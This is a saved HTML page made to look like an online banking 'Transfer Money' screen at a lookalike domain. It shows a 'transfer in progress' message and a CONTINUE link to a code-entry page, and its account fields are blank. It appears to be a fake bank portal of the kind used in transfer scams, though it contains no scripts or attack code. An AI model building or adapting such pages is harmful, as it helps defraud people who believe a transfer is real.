
<!-- saved from url=(0060)http://uk.sambabk.com/e/admin3/transfer_2a.php?account=&cid= -->
<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta http-equiv="Content-Language" content="en-us">

<title>New Page 1</title>
<link rel="stylesheet" type="text/css" href="./cot2_files/style.css">
<style type="text/css"></style></head>

<body>

<table border="0" width="820" cellspacing="0" cellpadding="0" style="border:1px solid #a3a3a3">
	<tbody><tr>
		<td style="padding:10px" bgcolor="#EEEEEE">
		<table border="0" width="100%" cellspacing="1">
			<tbody><tr>
				<td width="392">Welcome,&nbsp; <b>&nbsp;</b></td>
				<td>
				Today: <b>25th July 2017 </b></td>
				<td width="176">
				<p align="right">Secure Online banking</p></td>
			</tr>
		</tbody></table>
		</td>
	</tr>
	<tr>
		<td bgcolor="#0088cc">&nbsp;
		</td>
	</tr>
	<tr>
		<td style="padding:10px; vertical-align:top" height="164">&nbsp;</td>
	</tr>
	<tr>
		<td style="padding:10px; vertical-align:top">
		<table border="0" width="100%" cellspacing="0" cellpadding="0">
			<tbody><tr>
				<td width="190" style="padding:10px; border:1px solid #f4cd58; border-right:0px" bgcolor="#FBF2A5">
				Quick Menu</td>
				<td style="padding:10px; border:1px solid #f4cd58;" bgcolor="#FFFFCF">
				Transfer Money</td>
			</tr>
			<tr>
				<td width="192" style="padding:10px; vertical-align:top">
				<table border="0" width="100%" cellspacing="0" cellpadding="0">
					<tbody><tr>
						<td width="16" style="padding:5px; border:1px solid #a3a3a3">
						<img border="0" src="./cot2_files/acc_we8.gif"></td>
						<td style="padding:5px; border:1px solid #a3a3a3">
						<font size="2"><a href="http://uk.sambabk.com/e/admin3/acc_welcome.php?account=">Home</a></font></td>
					</tr>
					<tr>
						<td width="16" style="padding:5px; border:1px solid #a3a3a3">
						<img border="0" src="./cot2_files/acc_we9.gif"></td>
						<td style="padding:5px; border:1px solid #a3a3a3">
						<font size="2"><a href="http://uk.sambabk.com/e/admin3/transactions.php?account=">View Transactions</a></font></td>
					</tr>
					<tr>
						<td width="16" style="padding:5px; border:1px solid #a3a3a3">
						<img border="0" src="./cot2_files/acc_we10.gif"></td>
						<td style="padding:5px; border:1px solid #a3a3a3">
						<font size="2"><a href="http://uk.sambabk.com/e/admin3/paybill.php?account=">Pay a bill 
						/ someone</a></font></td>
					</tr>
					<tr>
						<td width="16" style="padding:5px; border:1px solid #a3a3a3">
						<img border="0" src="./cot2_files/acc_we11.gif"></td>
						<td style="padding:5px; border:1px solid #a3a3a3">
						<font size="2"><a href="http://uk.sambabk.com/e/admin3/transfer_money.php?account=">Transfer Money</a></font></td>
					</tr>
					<tr>
						<td width="16" style="padding:5px; border:1px solid #a3a3a3">
						<img border="0" src="./cot2_files/acc_we12.gif"></td>
						<td style="padding:5px; border:1px solid #a3a3a3">
						<font size="2"><a href="http://uk.sambabk.com/e/admin3/add_services.php?account=">Add Services</a></font></td>
					</tr>
					<tr>
						<td width="16" style="padding:5px; border:1px solid #a3a3a3">
						<img border="0" src="./cot2_files/acc_we13.gif"></td>
						<td style="padding:5px; border:1px solid #a3a3a3">
						<font size="2"><a href="http://uk.sambabk.com/e/admin3/user_profile.php?account=">User Profile</a></font></td>
					</tr>
					<tr>
						<td width="16" style="padding:5px; border:1px solid #a3a3a3">
						<img border="0" src="./cot2_files/acc_we14.gif"></td>
						<td style="padding:5px; border:1px solid #a3a3a3">
						<font size="2"><a href="http://uk.sambabk.com/e/admin3/logout.php">Logout</a></font></td>
					</tr>
				</tbody></table>
				</td>
				<td style="padding:10px; border:1px solid #f4cd58; vertical-align:top; border-top:0px">
					<table border="0" width="102%" id="table17" height="195" cellspacing="0">
						<tbody><tr>
							<td class="textMenuBar">
																															<table border="0" width="100%" height="228" cellspacing="1">
																																<tbody><tr>
                      <td align="left" class="normaltext" height="93" style="BORDER-TOP: 0px solid" width="100%" bgcolor="#FFFFFF">
                      	<p align="center" style="margin-top: -1px; margin-bottom: -1px">&nbsp;
						</p>
						<p align="center" style="margin-top: -1px; margin-bottom: -1px">
						<font size="2">Transfer process in progress. This may 
						take some minutes to complete.</font></p>
                      	<p align="center">
						</p><div class="load" style="width:500px;height:200px">
						<p align="center">
						<img border="0" src="./cot2_files/2a.gif" width="432" height="139" align="right"></p></div></td>
																																</tr>
																																<tr>
																																	<td width="150" height="17"></td>
																																	<td height="17"></td>
																																</tr>
																															</tbody></table>
																															<table border="0" width="100%">
																																<tbody><tr>
																																			<td width="37%" height="29">&nbsp;</td>
																																			<td width="23%" bgcolor="#0088cc" height="29">
																																			<p align="center"><b><font color="#FFFFFF" size="2"><a href="http://uk.sambabk.com/e/admin3/transfer_2a_entercode.php?account=&amp;cid="><span style="text-decoration: none"><font color="#FFFFFF">CONTINUE</font></span></a></font></b></p></td>
																																			<td width="38%" height="29">&nbsp;</td>
																																		</tr>
																																<tr>
																																	<td>&nbsp;
																																	</td>
																																</tr>
																															</tbody></table>
							</td>
						</tr>
						</tbody></table>
						</td>
			</tr>
		</tbody></table>
		</td>
	</tr>
	<tr>
		<td bgcolor="#EEEEEE">&nbsp;</td>
	</tr>
</tbody></table>
<table border="0" width="100%" cellspacing="1">
  <tbody>
    <tr>
      <td width="134" style="padding:10px; border:1px solid #a3a3a3"><img src="" height="0" width="0"></td>
      <td style="padding:10px; vertical-align:top; padding-right:0px"><table border="0" width="100%" height="122" cellspacing="0" cellpadding="0">
        <tbody>
          <tr>
            <td width="140" align="right" style="border-style:solid; border-width:0px; "><font size="2">Name: </font></td>
            <td align="left" style="border:1px solid #c3c3c3; border-bottom:0px"><font size="2">&nbsp;&nbsp;</font></td>
          </tr>
          <tr>
            <td width="140" align="right" style="border-style:solid; border-width:0px; "><font size="2">Account Number:</font></td>
            <td align="left" style="border:1px solid #c3c3c3; border-bottom:0px"><font size="2">&nbsp;</font></td>
          </tr>
          <tr>
            <td width="140" align="right" style="border-style:solid; border-width:0px; "><font size="2">Sort code:</font></td>
            <td align="left" style="border:1px solid #c3c3c3; border-bottom:0px"><font size="2">&nbsp;</font></td>
          </tr>
          <tr>
            <td width="140" align="right" style="border-style:solid; border-width:0px; "><font size="2">Date of 
              Deposit:</font></td>
            <td align="left" style="border:1px solid #c3c3c3"><font size="2">&nbsp; </font></td>
          </tr>
        </tbody>
      </table></td>
    </tr>
  </tbody>
</table>

<p>&nbsp;</p>



</body></html>